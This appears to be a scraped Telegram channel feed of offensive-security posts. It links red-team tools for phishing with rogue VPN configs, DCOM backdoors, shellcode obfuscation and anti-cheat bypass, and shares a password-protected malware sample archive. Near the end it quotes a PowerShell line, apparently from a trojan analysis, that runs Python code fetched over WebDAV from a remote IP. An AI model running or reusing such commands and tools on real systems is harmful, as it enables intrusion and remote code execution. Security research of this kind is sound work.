Rogue OpenVpn and WireGuard! 🧭
Still sending docm macros? Reconsider your phishing noscripts! Send openvpn and wireguard configurations! U can easily achieve command exec using VPN : )
Examples here:
https://github.com/CICADA8-Research/Penetration.git
Still sending docm macros? Reconsider your phishing noscripts! Send openvpn and wireguard configurations! U can easily achieve command exec using VPN : )
Examples here:
https://github.com/CICADA8-Research/Penetration.git
👍7🔥2👏1🥱1
Forget PSEXEC: DCOM Upload & Execute Backdoor
https://www.deepinstinct.com/blog/forget-psexec-dcom-upload-execute-backdoor
https://www.deepinstinct.com/blog/forget-psexec-dcom-upload-execute-backdoor
🔥10🥱3👍2👏1
LexiCrypt is a shellcode obfuscation and encoding tool that transforms raw shellcode bytes into a "lexicon" of words derived from file names in the windows system32 directory. The resulting encoded output can then be embedded into a code template in various programming languages (e.g., C++, Rust, C#, Go, VBScript/WScript). This approach can help disguise shellcode and potentially bypass naive detection mechanisms.
https://github.com/tehstoni/LexiCrypt.git
https://github.com/tehstoni/LexiCrypt.git
👍8🔥1
🔥 Initial Access Guild registration is now open! 🔥
Offensive Engineers, let us unite in a trusted, vetted community!
I invite you to a curated closed Discord server, where ideas can be exchanged safely.
☢️ binary-offensive.com/guild ☢️
See you inside fellow Breacher!
Offensive Engineers, let us unite in a trusted, vetted community!
I invite you to a curated closed Discord server, where ideas can be exchanged safely.
☢️ binary-offensive.com/guild ☢️
See you inside fellow Breacher!
👍7🔥3😁2👾2⚡1👌1
Custom instruction length for hex-rays
https://github.com/milankovo/instrlen.git
The Instrlen plugin is a tool for IDA Pro that allows for setting the length of an instruction to a custom value. This can be useful when the code is obfuscated or there are jumps after the instruction prefixes.
https://github.com/milankovo/instrlen.git
😁4👍1
CPP / C++ Notes - Windows API Programming Win32
https://caiorss.github.io/C-Cpp-Notes/WindowsAPI-cpp.html#orge9d5c6d
https://caiorss.github.io/C-Cpp-Notes/WindowsAPI-cpp.html#orge9d5c6d
🔥8👍1
Forwarded from K4YT3X's Channel (K4YT3X)
之前一个很简单绕过内核反作弊的方法我开源了:
https://github.com/k4yt3x/InstantSuspend
基本上就是在进程被驱动保护之前你 suspend 它就可以给你个机会 OpenProcess 拿到 handle 或者改代码之类的,有些反作弊解冻进程之后后续还是不能读写内存,有些只要拿到了 handle 后面就能继续用
实在是很简单,也没必要藏着掖着
https://github.com/k4yt3x/InstantSuspend
基本上就是在进程被驱动保护之前你 suspend 它就可以给你个机会 OpenProcess 拿到 handle 或者改代码之类的,有些反作弊解冻进程之后后续还是不能读写内存,有些只要拿到了 handle 后面就能继续用
实在是很简单,也没必要藏着掖着
👍1🔥1😁1🤔1
PhishiUrl
https://github.com/EmadYaY/PhishiUrl
A tool for generating and detecting Unicode domains to identify phishing URLs, aimed at assisting cybersecurity professionals in recognizing and mitigating homograph attacks.
https://github.com/EmadYaY/PhishiUrl
🔥7👍2❤1😁1🙏1
Catalog of key Windows kernel data structures
https://codemachine.com/articles/kernel_structures.html
Understanding EProcess Structure
https://info-savvy.com/understanding-eprocess-structure/
Thanks to https://x.com/5mukx
https://codemachine.com/articles/kernel_structures.html
Understanding EProcess Structure
https://info-savvy.com/understanding-eprocess-structure/
Thanks to https://x.com/5mukx
❤4👾1
Just an attempt to group extracted data from Defender for research purposes.
https://github.com/HackingLZ/ExtractedDefender
credits : Justin Elze
https://github.com/HackingLZ/ExtractedDefender
credits : Justin Elze
👍2
Local Admin In Less Than 60 Seconds (Part 1)
https://medium.com/@nickvourd/local-admin-in-less-than-60-seconds-part-1-e2a0c0102b99
https://medium.com/@nickvourd/local-admin-in-less-than-60-seconds-part-1-e2a0c0102b99
❤3
Snowy Days & The Malware Packing Ways
https://deluks2006.github.io/posts/snowy-days-and-the-malware-packing-ways/
#packers
https://deluks2006.github.io/posts/snowy-days-and-the-malware-packing-ways/
#packers
Source Byte
I gathered samples related to Attack Against Iran’s State Broadcaster if you have access to those three missing files plz share it in group file pass : infected credits : vx-underground MalwareBazaar checkpoint
Iran’s State Broadcaster.zip
4.2 MB
Thanks " a gh " for sharing missing files ( two windows event logs )
password is
password is
infected❤12🔥2👍1
Forwarded from Infosec Fortress
SSHishing – Abusing Shortcut Files and the Windows SSH Client for Initial Access
🔗 Link
#redteam
#initial_access
———
🆔 @Infosec_Fortress
🔗 Link
#redteam
#initial_access
———
🆔 @Infosec_Fortress
👍4❤3🔥3
Infosec Fortress
SSHishing – Abusing Shortcut Files and the Windows SSH Client for Initial Access 🔗 Link #redteam #initial_access ——— 🆔 @Infosec_Fortress
https://cyble.com/blog/ursnif-trojan-hides-with-stealthy-tactics/
lnk are so strange you can literally do anything with them and yet no security log to detect them :(
lnk are so strange you can literally do anything with them and yet no security log to detect them :(
👍5
or even run python remotely
-w hid -nop -c "[system.Diagnostics.Process]::Start('msedge','http://194.126.178.8/webdav/wody.pdf'); \\194.126.178.8@80\webdav\Python39\python.exe \\194.126.178.8@80\webdav\Python39\Client.py"👍5